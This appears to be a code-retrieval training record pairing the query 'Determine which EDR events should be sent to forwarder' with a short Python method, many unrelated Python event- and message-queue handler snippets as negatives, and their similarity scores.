QUEUE_WAIT_TIMEOUT in EventRouterHTTPS.py\n if self._simplex == True:\n self._queueEvent.wait()\n self._queueEvent.clear()\n \n if not self._queue.empty():\n Trace(\"%s queue.get ...\"%(self.getUri()), \"EventLib.EventRelayHTTPC\")\n ###msgbody = self._queue.get()\n ###Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n ###self._event.set()\n msgbody = self.getQueuedItem()\n [typ,env] = msgbody\n if typ == \"closedown\":\n if self._closing: break\n else:\n # process request as an HTTP POST request\n data = makeEnvelopeData(env)\n headers = { \"Content-type\": \"text/plain\",\n \"Accept\": \"text/plain\",\n \"Content-length\": str(len(data)) }\n self._httpcon.request(\"POST\", \"/request_path_ignored\", data, headers)\n response = self._httpcon.getresponse()\n delay_on_error = delay_on_error_min\n elif self._simplex == False:\n # Nothing in queue:\n # issue a GET for incoming events\n _log.info(\"%s HTTP get ...\"%(self.getUri()))\n headers = { \"Accept\": \"text/plain\" }\n self._httpcon.request(\"GET\", \"/request_path_ignored\", None, headers)\n response = self._httpcon.getresponse()\n if response.status == 200:\n delay_on_error = delay_on_error_min\n msgbody = response.read()\n Trace(\"%s get msgbody: %s\"%(self.getUri(),msgbody), \"EventLib.EventRelayHTTPC\")\n # Parse message and act accordingly\n msgdata = parseMessageData(msgbody)\n Trace(\"%s get msgdata: %s\"%(self.getUri(),str(msgdata)), \"EventLib.EventRelayHTTPC\")\n if msgdata == None:\n #TODO: Log \"Request body malformed\"\n pass\n elif msgdata[0] == \"forward\":\n # msgdata = [\"forward\", [['R1', 'R2', 'R3'], 'ev:typ', 'ev:src', 'payload']]\n event = makeEvent(evtype=msgdata[1][1],source=msgdata[1][2],payload=msgdata[1][3])\n env = constructEnvelope(msgdata[1][0], event)\n self.forward(event, env)\n elif msgdata[0] == \"idle\":\n # Idle response gives client a chance to send if anything is queued\n pass\n else:\n #TODO: handle closedown message?\n Warn( \"%s Request body unrecognized option: %s\"%(self.getUri(),msgdata[0]), \"EventRelayHTTPC\")\n pass\n elif response.status == 503:\n Trace( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n # Remote end closed down\n break\n else:\n # TODO: (log error response)\n Warn( \"%s processEvent error response: %u, %s\"%(self.getUri(),response.status,response.reason), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n \n except httplib.BadStatusLine, e:\n # This can happen at closedown\n Info( \"%s processEvent bad response: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.CannotSendRequest, e:\n # This can happen at closedown\n Info( \"%s Cannot send request: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except httplib.ResponseNotReady, e:\n # This can happen at startup and sometimes other times:\n # maybe multiple requests on a single HTTP connection object?\n Info( \"%s Response not ready: (%s)\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n except socket.error, e:\n Warn( \"%s Socket error: %s\"%(self.getUri(), str(e)), \"EventLib.EventRelayHTTPC\")\n time.sleep(delay_on_error)\n return", "def run(self):\r\n while True:\r\n try:\r\n processor, iprot, oprot, otrans, callback = self.queue.get()\r\n if processor is None:\r\n break\r\n processor.process(iprot, oprot)\r\n callback(True, otrans.getvalue())\r\n except Exception:\r\n logging.exception(\"Exception while processing request\")\r\n callback(False, '')", "def test_dispatch_event(self):\n msg_helper = MessageHelper()\n worker_helper = WorkerHelper()\n broker = self.setup_broker(worker_helper)\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [])\n msg = msg_helper.make_ack()\n yield worker_helper.dispatch_event(msg, 'fooconn')\n self.assertEqual(broker.get_messages('vumi', 'fooconn.event'), [msg])", "def process(self, message: Message, **kwargs: Any) -> None:\n pass", "async def do_run(self, event_bus: EndpointAPI) -> None:\n ...", "def application_message(self, bus, msg):\n\t\tmsgtype = msg.structure.get_name()\n\t\tif msgtype == 'partial_result':\n\t\t\tself.partial_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\telif msgtype == 'result':\n\t\t\tself.final_result(msg.structure['hyp'], msg.structure['uttid'])\n\t\t\tself.pipeline.set_state(gst.STATE_PAUSED)", "def process(self, msg):\n raise NotImplemented", "def process_message(self, msg, src):", "def process_message(self, message):\n self.post_to_redis(message)\n return", "def dispatch(self, event):\n self.queue.put(event)", "def onMessage(self, msg, binary):\r\n self._assembler.processMessage(msg, binary)", "def emit(self, record):\n try:\n # Format: [ [queueMsgID, PID], record ]\n self.queue.put([[config.DUMMYMP_LOG_ID, os.getpid(), self.int_pid], record])\n except:\n # Something went wrong...\n self.handleError(record)", "def process(self):\n main_thread_exited = False\n\n while True:\n if not main_thread_exited and not threading.main_thread().is_alive():\n log.info(\"%s exited\", threading.main_thread().name)\n main_thread_exited = True\n self.finish()\n\n try:\n with self._lock:\n span = self._queue.get(block=False)\n if span is None:\n self._sender.close()\n log.info(\"Processing has been finished\")\n return\n\n for data in span.get_data():\n self._sender.emit_with_time(\n label=data['label'],\n timestamp=data['timestamp'],\n data=data['data']\n )\n except Empty:\n time.sleep(0.1)", "def process(self, user_event: UserEvent) -> None:\n pass", "def collect_data(self):\n self.logger.info(\"Waiting for incoming data ...\")\n while True:\n item = self.in_queue.get()\n self.logger.info(\"Received data!\")\n self.collector_process_data(item)", "async def process(self, message):\n return await self.dispatcher.dispatch(message)", "def __producer__(self):\n import time\n i = 0\n while True:\n self.publish( i )\n i += 1\n time.sleep(1)", "def drive(self, event, *args):\n\n maps = self.base.get(event, self.step)\n for handle, data in maps[:]:\n params = args + data\n try:\n handle(self, *params)\n except Stop:\n break\n except StopIteration:\n pass\n except Kill, Root:\n raise\n except Erase:\n maps.remove((handle, data))\n except Exception as e:\n debug(event, params)\n\n for handle in self.pool:\n handle(self, event, args)", "def processIncoming(self):\n while self.queue.qsize():\n try:\n # print 'queue'\n msg = self.queue.get(0)\n # Check contents of message and do what it says\n # As a test, we simply print it\n if msg == \"exit\":\n self.deviceError()\n if msg == \"error\":\n self.deviceError()\n else:\n self.decode(msg)\n except Queue.Empty:\n pass", "def emit(self, message):", "def _dispatch_messages(self):\n while True:\n select_obj = (yield)\n if select_obj == self._message_queue.selobj:\n msg = self._message_queue.get_nowait()\n if msg is not None:\n msg_type = msg.get('type', None)\n if msg_type is not None:\n msg_handler = self._message_handlers.get(msg_type, None)\n if msg_handler is not None:\n msg_handler(msg['data'])", "def put_event(self, event):\n log.info(\"==> event=%s\", event)\n assert self.subscription_list is not None\n assert self.read_queue is not None\n self.read_queue.put(event)\n log.info(\"<== \")", "def process(self, event):\n if isinstance(event, MLFRecordStartEvent):\n assert hasattr(event, 'record_filename')\n self._current = []\n elif isinstance(event, MLFLabelEvent):\n if not self._label_event_handler:\n self._current.append(event)\n else:\n self._current.append(self._label_event_handler(event))\n elif isinstance(event, MLFRecordEndEvent):\n out_event = MLFBlockEvent(event.record_filename, self._current)\n self.send(out_event)\n else:\n raise NotImplemented(\"wasn't expecting an event of type %s\" % (type(event)))", "def handle(self, message):", "def _process(self, activity):", "def process(self, message):\n if self.debug:\n self.log(\"Publishing: \" + str(message.data))\n self.channel.basic.publish(\n AMQPMessage(str(message.data)),\n self.exchange, self.routing_key)", "def process(self, message):\n if self.debug:\n self.log(\"Publishing: \" + str(message.data))\n self.channel.basic.publish(\n AMQPMessage(str(message.data)),\n self.exchange, self.routing_key)", "async def process_event(event_message, flask_app):\n if not flask_app:\n raise QueueException('Flask App not available.')\n\n with flask_app.app_context():\n message_type = event_message.get('type', None)\n\n if message_type == 'bc.registry.names.events':\n await process_name_events(event_message)", "def _dispatch(self, msg):\n self.debug(\"Dispatching message CMD %r %s\", msg.cmd, msg)\n if msg.seqno in self.listeners:\n # self.debug(\"Dispatching sequence number %d\", msg.seqno)\n sem = self.listeners[msg.seqno]\n if isinstance(sem, asyncio.Semaphore):\n self.listeners[msg.seqno] = msg\n sem.release()\n else:\n self.debug(\"Got additional message without request - skipping: %s\", sem)\n elif msg.cmd == HEART_BEAT:\n self.debug(\"Got heartbeat response\")\n if self.HEARTBEAT_SEQNO in self.listeners:\n sem = self.listeners[self.HEARTBEAT_SEQNO]\n self.listeners[self.HEARTBEAT_SEQNO] = msg\n sem.release()\n elif msg.cmd == UPDATEDPS:\n self.debug(\"Got normal updatedps response\")\n if self.RESET_SEQNO in self.listeners:\n sem = self.listeners[self.RESET_SEQNO]\n self.listeners[self.RESET_SEQNO] = msg\n sem.release()\n elif msg.cmd == SESS_KEY_NEG_RESP:\n self.debug(\"Got key negotiation response\")\n if self.SESS_KEY_SEQNO in self.listeners:\n sem = self.listeners[self.SESS_KEY_SEQNO]\n self.listeners[self.SESS_KEY_SEQNO] = msg\n sem.release()\n elif msg.cmd == STATUS:\n if self.RESET_SEQNO in self.listeners:\n self.debug(\"Got reset status update\")\n sem = self.listeners[self.RESET_SEQNO]\n self.listeners[self.RESET_SEQNO] = msg\n sem.release()\n else:\n self.debug(\"Got status update\")\n self.listener(msg)\n else:\n if msg.cmd == CONTROL_NEW:\n self.debug(\"Got ACK message for command %d: will ignore it\", msg.cmd)\n else:\n self.debug(\n \"Got message type %d for unknown listener %d: %s\",\n msg.cmd,\n msg.seqno,\n msg,\n )", "def run(self):\r\n self.env.process(self.rw_pifo_sm())", "def dispatch(self, event: str, message: str) -> None:\n\t\tfor subscriber, callback in self.get_subscribers(event).items():\n\t\t\tcallback(event, message)", "def process_processor_only_event(self, data, processor):\n processor.add_task_independant_event(data['timestamp'], data['type_of_event'], data['extra_data'])", "def process(msg, context, region):\n\n job_id = int(msg['ingest_job'])\n chunk_key = msg['chunk_key']\n tile_key = msg['tile_key']\n print(\"Tile key: {}\".format(tile_key))\n\n proj_info = BossIngestProj.fromTileKey(tile_key)\n\n # Set the job id\n proj_info.job_id = msg['ingest_job']\n\n print(\"Data: {}\".format(msg))\n\n # update value in the dynamo table\n tile_index_db = BossTileIndexDB(proj_info.project_name)\n chunk = tile_index_db.getCuboid(chunk_key, job_id)\n if chunk:\n if tile_index_db.cuboidReady(chunk_key, chunk[\"tile_uploaded_map\"]):\n print(\"Chunk already has all its tiles: {}\".format(chunk_key))\n # Go ahead and setup to fire another ingest lambda so this tile\n # entry will be deleted on successful execution of the ingest lambda.\n chunk_ready = True\n else:\n print(\"Updating tile index for chunk_key: {}\".format(chunk_key))\n chunk_ready = tile_index_db.markTileAsUploaded(chunk_key, tile_key, job_id)\n else:\n # First tile in the chunk\n print(\"Creating first entry for chunk_key: {}\".format(chunk_key))\n try:\n tile_index_db.createCuboidEntry(chunk_key, job_id)\n except ClientError as err:\n # Under _exceptional_ circumstances, it's possible for another lambda\n # to beat the current instance to creating the initial cuboid entry\n # in the index.\n error_code = err.response['Error'].get('Code', 'Unknown')\n if error_code == 'ConditionalCheckFailedException':\n print('Chunk key entry already created - proceeding.')\n else:\n raise\n chunk_ready = tile_index_db.markTileAsUploaded(chunk_key, tile_key, job_id)\n\n # ingest the chunk if we have all the tiles\n if chunk_ready:\n print(\"CHUNK READY SENDING MESSAGE: {}\".format(chunk_key))\n # insert a new job in the insert queue if we have all the tiles\n ingest_queue = IngestQueue(proj_info)\n ingest_queue.sendMessage(json.dumps(msg))\n\n # Invoke Ingest lambda function\n names = AWSNames.from_lambda(context.function_name)\n lambda_client = boto3.client('lambda', region_name=region)\n lambda_client.invoke(\n FunctionName=names.tile_ingest.lambda_,\n InvocationType='Event',\n Payload=json.dumps(msg).encode())\n else:\n print(\"Chunk not ready for ingest yet: {}\".format(chunk_key))\n\n print(\"DONE!\")", "def execute(self):\n self.running = True\n last_timestamp = datetime.datetime.now()\n\n self.log(\"Starting...\")\n while self.running:\n\n try:\n\n # if (datetime.datetime.now() - last_timestamp).total_seconds() < self.sendfreq:\n # self.tick()\n # continue\n\n # if self.debug:\n\n sent = 0\n while self.inbox.qsize() > 0:\n\n # Boolean flag to determine message validity\n valid = True\n\n # get message\n message = self.inbox.get_nowait()\n\n # Iterates over all the filters and overrides to modify the\n # stream's default capability.\n for modifier in self.modifiers:\n if isinstance(modifier, BaseOverride):\n message = modifier.apply(message)\n elif isinstance(modifier, BasePredicate):\n if not modifier.apply(message):\n valid = False\n\n # Must be a break and not return because setting\n # the initialization flag would be skipped if it\n # needed to be set.\n break\n\n # the incoming message was not filtered\n if valid:\n\n # process the incoming message\n self.handle(message)\n\n sent += 1\n\n if self.sendlimit > 0:\n if sent >= self.sendlimit:\n break\n\n # logging sent messages\n self.log(\"Sent %s messages...\" % (sent - 1 if sent > 0 else 0))\n\n except Empty:\n # Empty signifies that the queue is empty, so yield to another node\n pass\n except Exception:\n self.log_exception(\"Error in '%s': %s\" % (self.__class__.__name__, self.name))\n # self.tick()\n finally:\n # delay processing\n self.sleep(self.sendfreq)\n\n # self.tick()\n # self.stop()\n self.log(\"Exiting...\")", "def _process_message(self, obj):\n pass", "def process_sink_msg(self):\n logging.debug('Received message on the sink socket')\n \n msg = self.sink_socket.recv_json()\n \n logging.debug('Message: %s', msg)\n\n # Publish the results to the clients using the\n # request id of the service request as the topic\n self.result_pub_socket.send_unicode(msg['uuid'], zmq.SNDMORE)\n self.result_pub_socket.send_json(msg)", "def process(self, user_event: UserEvent) -> None:\n if not isinstance(user_event, UserEvent):\n self.logger.error('Provided event is in an invalid format.')\n return\n\n self.logger.debug(\n f'Received event of type {type(user_event).__name__} for user {user_event.user_id}.'\n )\n\n try:\n self.event_queue.put_nowait(user_event)\n except queue.Full:\n self.logger.warning(\n f'Payload not accepted by the queue. Current size: {self.event_queue.qsize()}'\n )", "def process(self, payload, status_code=0):", "def enqueue(self,e):", "def on_msg_recv(msg):\n print \"processor|%s::Received message: %s\" % (UID, msg.body)\n chan.basic_ack(msg.delivery_tag)\n log(msg.body)\n process_msg(msg)", "def test_process_message_queue(self):\n t = threading.Thread(target=self.handle_message_queue)\n t.start()\n\n self.dut._process_message_queue()\n\n t.join()", "def process(self, packet):\n pass", "def process_received_message(self, message):\n self.log.debug('Received \"%s\"', message)\n self.receive_queue.put(message)", "def endpoint_write_worker(endpoint, condition):\n while condition:\n msg = endpoint.message_get(block=True)\n endpoint.write(apply_filters(msg.raw_data, *endpoint.get_output_filters()))", "def queue_emission(self, msg):\n if not msg:\n return\n for _emitter in self._emit:\n if not hasattr(_emitter, 'emit'):\n continue\n def emit(emitter=_emitter):\n self.log.debug(\"emit to {}\".format(emitter.name))\n emitter.emit(msg)\n self.log.debug(\"queue emission to {} ({})\".format(\n _emitter.name, self._emit_queue.qsize()))\n self._emit_queue.put(emit)", "def consumer(state: SharedState):", "def run(self):\n init()\n list_name = comet_config.REDIS_NAMESPACE + \"incoming/\" + self.service_name\n list_name_processing = list_name + \"/processing\"\n self.redis = r\n while True:\n try:\n item = self.redis.brpoplpush(list_name, list_name_processing)\n self.process_incoming(item)\n self.redis.lrem(list_name_processing, item)\n\n except redis.ConnectionError:\n pass", "def process(self, message, callback):\n\n\t\tif message.type == message_type.EMIT:\n\t\t\t# We are in the server, the message has just been built.\n\t\t\t# Forward it nearly \"as is\". Only the message type is changed,\n\t\t\t# to make us know it has been processed one time since emission,\n\t\t\t# and thus the next hop will be the client, which has the task\n\t\t\t# to display it, and eventually get an interactive answer.\n\n\t\t\tassert ltrace(TRACE_MESSAGING, ' MessageProcessor.process(EMIT)')\n\n\t\t\tif message.interaction:\n\n\t\t\t\tif message.interaction == interactions.ASK_FOR_REPAIR:\n\n\t\t\t\t\tmessage.answer = ttyutils.interactive_ask_for_repair(message.data,\n\t\t\t\t\t\tauto_answer=message.auto_answer)\n\n\t\t\t\telif message.interaction == interactions.GET_PASSWORD:\n\n\t\t\t\t\tmessage.answer = getpass.getpass(message.data)\n\n\t\t\t\telse:\n\t\t\t\t\tassert ltrace(TRACE_MESSAGING,\n\t\t\t\t\t\t'unsupported interaction type in message %s.' % message)\n\t\t\t\t\tmessage.answer = None\n\n\t\t\t\tmessage.type = message_type.ANSWER\n\t\t\t\treturn callback.process(message, self.getAttrProxy())\n\n\t\t\telse:\n\t\t\t\tif message.clear_terminal:\n\t\t\t\t\tttyutils.clear_terminal(MessageProcessor.channels[message.channel])\n\n\t\t\t\tchan_flush = MessageProcessor.channels[message.channel].flush\n\t\t\t\tchan_write = MessageProcessor.channels[message.channel].write\n\n\t\t\t\tif message.word_delay:\n\t\t\t\t\tdelay = message.word_delay\n\t\t\t\t\tfor word in message.data.split(' '):\n\t\t\t\t\t\tchan_write(word + ('' if word.endswith('\\n') else ' '))\n\t\t\t\t\t\tchan_flush()\n\t\t\t\t\t\ttime.sleep(delay)\n\n\t\t\t\telif message.char_delay:\n\t\t\t\t\tdelay = message.char_delay\n\t\t\t\t\tfor char in message.data:\n\t\t\t\t\t\tchan_write(char)\n\t\t\t\t\t\tchan_flush()\n\t\t\t\t\t\ttime.sleep(min(delay*4, 0.4) if char == ' ' else delay)\n\n\t\t\t\telse:\n\t\t\t\t\tchan_write(message.data)\n\n\t\t\t\tmessage.answer = None\n\n\t\telif message.type == message_type.ANSWER:\n\t\t\t# We are on the server, this is the answer from the client to\n\t\t\t# ourquestion. Return it directly to the calling process. The\n\t\t\t# message loop ends here.\n\n\t\t\tassert ltrace(TRACE_MESSAGING, ' MessageProcessor.process(ANSWER)')\n\n\t\t\t#message.channel.write(message.data)\n\t\t\treturn message.answer\n\t\telif message.type == message_type.PUSH_STATUS:\n\n\t\t\t# FIXME: is this really needed ? will the status be really pushed by this way ?\n\t\t\tfrom licorn.core import LMC\n\t\t\tLMC.machines.update_status(mid=message.sender,\n\t\t\t\tstatus=message.status)\n\n\t\telse:\n\t\t\traise exceptions.LicornRuntimeException('''Unrecognized message '''\n\t\t\t\t'''type %s for message %s.''' % (message.type, message))", "def process_queue(self):\n while not self.msg_queue.empty():\n addr, msg = self.msg_queue.get()\n if msg:\n print(msg)\n self.broadcast(addr, msg)\n else:\n self.clean(addr)", "def _handle_message(self, msg):\n self.event('message', msg)", "def event_in_cb(self, msg):\n self.event = msg.data", "def dispatch_event(event):\n queue = connect_to_sqs() \n logging.info('Writing event to SQS:' + str(json.dumps(event.params)))\n\n visitor = event.params['visitors'][0]['visitor_id']\n attributes = event.params['visitors'][0]['attributes']\n snapshot = event.params['visitors'][0]['snapshots'][0]\n\n response = queue.send_message(MessageBody=json.dumps({visitor: (attributes, snapshot)}))", "def main(event, context):\n\n logger.info(f\"Event data is: {event}\")\n try:\n # Incoming event is already byte encoded\n client.append_message(stream_name=\"LocalDataStream\", data=event)\n except Exception as e:\n logger.error(f\"Error appending: {e}\")\n return", "def handle(self):\n if self.locked:\n self.timer.start(0.01)\n return\n if not self.queue:\n return\n self.locked = True\n event = self.queue[0]\n self.queue = self.queue[1:]\n\n try:\n for handler in copy.copy(self.handler):\n handler(event)\n except Exception, e:\n log.exception('event callback')\n self.locked = False\n if self.queue and not self.timer.active:\n self.timer.start(0)", "def handle_events(self):\n self._busy_mutext.acquire()\n try:\n event = self.EventsFactory.pull_event()\n while event:\n self.logger.debug('Handling new event: {}'.format(event.id))\n event_endpoint_scope_classes = event.EndpointScope.get_static_hierarchy()\n stat_collection = []\n for statistics_cls in self._statistics:\n if statistics_cls.EndpointScope in event_endpoint_scope_classes:\n statistics = statistics_cls.init_by_event(event)\n self.logger.debug(f'Collecting statistics: {statistics}')\n stat_collection.append(statistics)\n statistics.collect()\n self.logger.debug('Checking for tasks to run')\n for task_cls in self.get_conditional_tasks():\n if task_cls.EndpointScope in event_endpoint_scope_classes:\n task_endpoint_scope_classes = task_cls.EndpointScope.get_static_hierarchy()\n statistics = []\n for stats in stat_collection:\n if stats.Endpoint == task_cls.Endpoint and stats.EndpointScope in task_endpoint_scope_classes:\n statistics.append(stats)\n task = task_cls(event.EndpointScope.init_by_event(event), statistics, event)\n task.handle()\n event = self.EventsFactory.pull_event()\n finally:\n self._busy_mutext.release()", "def pickle_event_loop(self, reader, writer):\n return PROC_ERROR", "def run(self):\n while True:\n try:\n processor, iprot, oprot, otrans, callback = self.queue.get()\n if processor is None:\n break\n callback.getContext().setProtocols(iprot, oprot)\n processor.process(iprot, oprot, callback.getContext())\n callback.success(reply=otrans.getvalue())\n except Exception:\n logging.exception(\"Exception while processing request\")\n callback.failure()", "def handle_event(event, context):\n\n try:\n print(\"Received event: \" + json.dumps(event, indent=2))\n\n # grab resources section of event, get task execution ids\n task_execution_arns = event['resources']\n\n # now fetch the input filter info from each task_detail, fire off jobs\n new_files_to_process = []\n for task_execution_arn in task_execution_arns:\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/datasync.html#DataSync.Client.describe_task_execution\n response = datasync_client.describe_task_execution(TaskExecutionArn=task_execution_arn)\n print(\"Task execution details: \" + str(response))\n # this will be the location of the data in configured s3 bucket:\n # 'Includes': [\n # {\n # 'FilterType': 'SIMPLE_PATTERN',\n # 'Value': 'string'\n # },\n # ]\n if len(response['Includes']) > 0:\n file = response['Includes'][0]['Value']\n # files typically start with leading '/', strip that leading '/'\n print(\"Got filename:\" + file)\n if file.startswith('/', 0):\n new_files_to_process.append(file.lstrip('/'))\n else:\n new_files_to_process.append(file)\n else:\n print(\"Response didn't contain Includes files...\")\n\n if len(new_files_to_process) == 0:\n print('No files were parsed from input...exiting')\n return\n\n for new_file_to_process in new_files_to_process:\n state_machine_arn = os.environ['STATE_MACHINE_ARN']\n payload = {\"ObjectName\": new_file_to_process}\n json_payload = json.dumps(payload)\n print('Starting bcl2fastq with payload %s' % json_payload)\n #\n response = step_client.start_execution(stateMachineArn=state_machine_arn, input=json_payload)\n print(response)\n\n except Exception as e:\n print(e)\n print('Error handling event. %s' % e)\n raise e", "def _worker(pipelines: List[Pipeline], source: Queue, sink: Queue):\n pipelines = list(pipelines)\n for i, p in enumerate(pipelines):\n if isinstance(p, ConvertT2S):\n pipelines[i] = ConvertT2S()\n\n def processor(article):\n for p in pipelines:\n article = p(article)\n return article\n\n while True:\n article = source.get()\n if article == 'EXIT':\n return\n article = list(processor(article))\n sink.put(article)", "def __process_input(self):\n\n while not self.stop_event.isSet():\n\n readable, writable, exceptional = select.select([self.event_queue], [], [])\n\n if readable[0] is self.event_queue:\n\n event = self.event_queue.get()\n \n if (time.time() - event.creation) > INSTRUCTION_TIMEOUT:\n self.logging_queue.put(self.__create_event_obj(ERROR, 'TimeOut', str(time.time() - event.creation)))\n self.logger1.info(\"Instruction rejected due to timeout: '{}', '{}', '{}'\".format(event.source, event.type, event.value))\n \n elif not self.__input_filter(event):\n self.logging_queue.put(self.__create_event_obj(ERROR, 'Filtered', '{}, {}, {}'.format(event.source, event.type, event.value)))\n \n else:\n \n self.logging_queue.put(event) \n \n if event.type == self.input_commands.toggle_door_cmd:\n self.__toggle_door()\n self.__update_door_info()\n elif event.type == self.input_commands.light_cmd:\n self.__light()\n elif event.type == self.input_commands.open_door_cmd:\n self.__open_door()\n self.__update_door_info()\n elif event.type == self.input_commands.close_door_cmd:\n self.__close_door()\n self.__update_door_info()\n elif event.type == self.input_commands.control_wire:\n self.__log_output_pin_state(event)\n self.__update_door_info()\n elif event.type == self.input_commands.stop_cmd:\n self.__del__()\n return None\n \n \n #if event.hardware:\n # self.__log_input_pin_state(event) ", "def publish(self, channel, event, data):\n if not channel in self.task_methods or \\\n not event in self.task_methods[channel]:\n return\n\n data['event_name'] = event;\n\n for consumer in self.task_methods[channel][event]:\n consumer.consume(channel, event, data)", "def send_emission(self):\n if self._emit_queue.empty():\n return\n emit = self._emit_queue.get()\n emit()", "def run(self):\n\t\tfor item in self.pubSub.listen():\n\t\t\tself.processItem(item)", "def processor(self, msgs):\n for msg in msgs:\n self.stats_reset()\n self.stats_update('proc_start', \"{}\".format(dnow()))\n u_print(\" Processing message: {}\".format(msg))\n\n self.process_body(msg)\n\n self.stats_update('proc_finish', \"{}\".format(dnow()))\n self.stats_show(prefix=\" Processor finished: \")\n\n return True", "def queue_processor(self):\n\n while self.state != consts.SMPP_CLIENT_STATE_CLOSED:\n try:\n p = self.queue.get(timeout=1)\n self._request_handler(p)\n self.queue.task_done()\n except Empty:\n pass", "def _process(self):\n export_collect_data(self.kwargs[\"collect\"])", "def process(proc_data):\n\n # No further processing\n return proc_data", "def receive_event(self):\n msg = self.msg_queue.get()\n\n # get the logical clock time of the machine that sent the message\n other_system_clock = msg[msg.index(\":\") + 1:] \n \n # set the clock time to the maximum of self's clock time and other \n # system's clock time\n self.clock_time = max(self.clock_time, int(other_system_clock))\n\n # increment the logical clock time and log that a message was received\n self.clock_time += 1\n self.log(\" Received message from \" + str(msg[:msg.index(\":\")]) + \n \" with LC time \" + str(msg[msg.index(\":\") + 2:]) + \n \"; messages left to process: \" + str(self.msg_queue.qsize()))", "def on_message(self, unused_channel, basic_deliver, properties, body):\n\n start = time.time()\n self.invocations += 1\n\n logger.info(\n u\"[{}] received message #{} from exchange {}: {}\".format(self.bot_id,\n basic_deliver.delivery_tag, self.exchange,\n body.decode('utf-8')))\n\n self.statsd.incr(self.statsd_prefix + \"message.receive\")\n\n # Ack the message before processing to tell rabbit we got it.\n # TODO before sending ack we should persist the message in a local queue to avoid the possibility of losing it\n self.acknowledge_message(basic_deliver.delivery_tag)\n\n try:\n\n try:\n json_body = json.loads(body)\n\n except ValueError as ve:\n logger.exception(\n \"[{}] Invalid JSON received from exchange: {} error: {} msg body: []\".format(self.bot_id,\n self.exchange,\n ve.message, body))\n raise\n\n else:\n response_messages = self.callback_func(json_body)\n\n if response_messages is None:\n response_messages = []\n\n logger.info(\"[{}] Sending {} response messages\".format(self.bot_id, len(response_messages)))\n\n for message in response_messages:\n self._channel.basic_publish(exchange=message.get('exchange', self.exchange),\n routing_key=message.get('queue', self.queue_name),\n body=message.get('body'))\n logger.info(\"[{}] published message {}\".format(self.bot_id, message))\n self.statsd.incr(self.statsd_prefix + \"message.publish\")\n\n except Exception as e:\n msg = \"[{}] Unexpected error - {}, message {}, from exchange {}. sending to error queue {}\"\n self.statsd.incr(self.statsd_prefix + \"message.error\")\n logger.exception(msg.format(self.bot_id, e, body, self.exchange, self.error_queue_name))\n self._channel.basic_publish(exchange='',\n routing_key=self.error_queue_name,\n body=body)\n\n\n exec_time_millis = int((time.time() - start) * 1000)\n self.total_execution_time += exec_time_millis\n\n logger.debug(\"Consumer {0} message handling time: {1}ms\".format(self.consumer_id, exec_time_millis))\n\n # if we have processed 100 messages, log out the average execution time at INFO then reset the total\n if self.invocations % 100 == 0:\n average_execution_time = self.total_execution_time / 100\n logger.info(\"Consumer {0} Avg message handling time (last 100): {1}ms\".format(self.consumer_id, average_execution_time))\n self.total_execution_time = 0\n\n self.statsd.timing(self.statsd_prefix + 'message.process.time', int((time.time() - start) * 1000))", "def _run(self) -> None:\n try:\n while True:\n loop_time = self._get_time()\n loop_time_flush_interval = self._get_time(self.flush_interval.total_seconds())\n\n if loop_time >= self.flushing_interval_deadline:\n self._flush_batch()\n self.flushing_interval_deadline = loop_time + loop_time_flush_interval\n self.logger.debug('Flush interval deadline. Flushed batch.')\n\n try:\n interval = self.flushing_interval_deadline - loop_time\n item = self.event_queue.get(True, interval)\n\n if item is None:\n continue\n\n except queue.Empty:\n continue\n\n if item == self._SHUTDOWN_SIGNAL:\n self.logger.debug('Received shutdown signal.')\n break\n\n if item == self._FLUSH_SIGNAL:\n self.logger.debug('Received flush signal.')\n self._flush_batch()\n continue\n\n if isinstance(item, UserEvent):\n self._add_to_batch(item)\n\n except Exception as exception:\n self.logger.error(f'Uncaught exception processing buffer. Error: {exception}')\n\n finally:\n self.logger.info('Exiting processing loop. Attempting to flush pending events.')\n self._flush_batch()", "def run_forever(self):\n while True:\n if not self._mailbox:\n self._event.wait()\n self._event = _event.Event()\n else:\n # leave the message in the mailbox until after it's\n # been processed so the event doesn't get triggered\n # while in the received method\n self._pool.spawn_n(\n self.received, self._mailbox[0])\n self._mailbox.popleft()", "def _publish(self,e):\n # translate here....\n ev = self.__enum_event_map[int(e)]\n print ev\n # publish here....\n self.__qf.publish(event.Event(ev))\n print \"complete\"" ]
[ "0.69330835", "0.6680876", "0.654648", "0.64165616", "0.6389811", "0.6374216", "0.6304277", "0.628056", "0.6252483", "0.6216612", "0.6205624", "0.6205508", "0.61948574", "0.61800677", "0.61060655", "0.6080079", "0.60410905", "0.6012227", "0.6012227", "0.6012227", "0.6008976", "0.6003605", "0.5994585", "0.5972889", "0.596654", "0.5957519", "0.59486914", "0.594602", "0.5921459", "0.59088665", "0.5868543", "0.5851607", "0.58372694", "0.5833668", "0.5828685", "0.58161545", "0.5808509", "0.5805901", "0.57837284", "0.57802266", "0.57681906", "0.57680696", "0.57650137", "0.5761256", "0.57223207", "0.5718608", "0.5712267", "0.5709145", "0.56862694", "0.5682313", "0.56748396", "0.56741583", "0.56604475", "0.56557405", "0.56557405", "0.5651104", "0.56465334", "0.5645878", "0.5639615", "0.5637068", "0.56336844", "0.56316173", "0.5613993", "0.56106937", "0.560116", "0.55966264", "0.5594269", "0.5593989", "0.55936265", "0.5592509", "0.5591192", "0.55830973", "0.558038", "0.5574924", "0.5574018", "0.5570899", "0.5570164", "0.5564789", "0.5563145", "0.5562332", "0.55538875", "0.5547865", "0.55478376", "0.55453426", "0.5543266", "0.55418336", "0.55311656", "0.5518022", "0.55179226", "0.55048764", "0.5501443", "0.550063", "0.5497633", "0.5497462", "0.54961985", "0.54923505", "0.5484489", "0.54833126", "0.54829997", "0.5469622" ]
0.62044877
12
Determine which EDR events should be sent to forwarder
def on_starting(self): self.set_capture_events_from_config()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
